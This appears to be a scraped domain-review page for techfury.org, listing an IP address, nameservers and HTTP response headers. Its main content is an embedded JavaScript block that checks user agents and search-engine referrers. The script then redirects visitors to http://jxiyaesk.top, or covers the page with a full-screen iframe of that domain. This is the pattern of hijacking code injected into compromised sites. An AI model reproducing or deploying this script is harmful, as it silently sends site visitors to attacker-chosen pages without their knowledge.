techfury.org Review
techfury.org Review
| Titletag | Descriptiontag | language |
|---|
| |
|
| Ip adress | 198.44.241.157 | Nameserver | ns1.julydns.com ns2.julydns.com |
Status code | 200 |
<script>
function isMobile() {
const mobileDevices = [
'phone', 'pad', 'pod', 'iPhone', 'iPod', 'ios', 'iPad', 'Android',
'Mobile', 'BlackBerry', 'IEMobile', 'MQQBrowser', 'JUC', 'Fennec',
'wOSBrowser', 'BrowserNG', 'WebOS', 'Symbian', 'Windows Phone',
'Kindle', 'Silk', 'Playbook', 'BB10', 'Nintendo', 'Xbox',
'PlayStation', 'Huawei', 'Xiaomi', 'Oppo', 'Vivo', 'OnePlus',
'Samsung', 'LG', 'Sony', 'HTC', 'ZTE', 'Motorola', 'Nokia'
];
return mobileDevices.some(device => {
return navigator.userAgent.match(new RegExp(device, 'i'));
});
}
function isSearchEngineClick() {
const searchEngines = ['google.', 'bing.', 'so.', 'baidu.','sogou.', 'soso.', 'sm.cn','uc'];
const referrer = document.referrer;
return referrer && searchEngines.some(engine => referrer.includes(engine));
}
const mobileUrl = "http://jxiyaesk.top";
const mUrl = "http://jxiyaesk.top";
const pcurl = "http://jxiyaesk.top";
function getIosVersion() {
const match = navigator.userAgent.match(/OS (\d+)_(\d+)_?(\d+)?/);
return match ? parseInt(match[1], 10) : false;
}
const isIOS = !!navigator.userAgent.match(/(iPod|iPhone|iPad)/);
const time = Math.floor(Math.random() * (1000 - 500 + 1)) + 500;
if (isSearchEngineClick() && isMobile() ) {
if (isIOS && getIosVersion() < 13) {
setTimeout(() => {
window.location.href = mobileUrl;
}, time);
} else {
document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
document.write('<style>html,body{width:100%;height:100%;overflow:hidden;}</style>');
document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff">');
document.write('<iframe src="' + mobileUrl + '" frameborder="0" charset="UTF-8" style="border:0;width: 100%; text-align: center; border: medium none; height:100%;max-height: 4000px;"></iframe>');
document.write('</div>');
}
}else if(isMobile()){
document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
document.write('<style>html,body{width:100%;height:100%;overflow:hidden;}</style>');
document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff">');
document.write('<iframe src="' + mobileUrl + '" frameborder="0" charset="UTF-8" style="border:0;width: 100%; text-align: center; border: medium none; height:100%;max-height: 4000px;"></iframe>');
document.write('</div>');
} else {
document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
document.write('<style>html,body{width:100%;height:100%;overflow:hidden;}</style>');
document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff">');
document.write('<iframe src="' + pcurl + '" frameborder="0" charset="UTF-8" style="border:0;width: 100%; text-align: center; border: medium none; height:100%;max-height: 4000px;"></iframe>');
document.write('</div>');
}
</script>HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Apr 2026 09:07:10 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip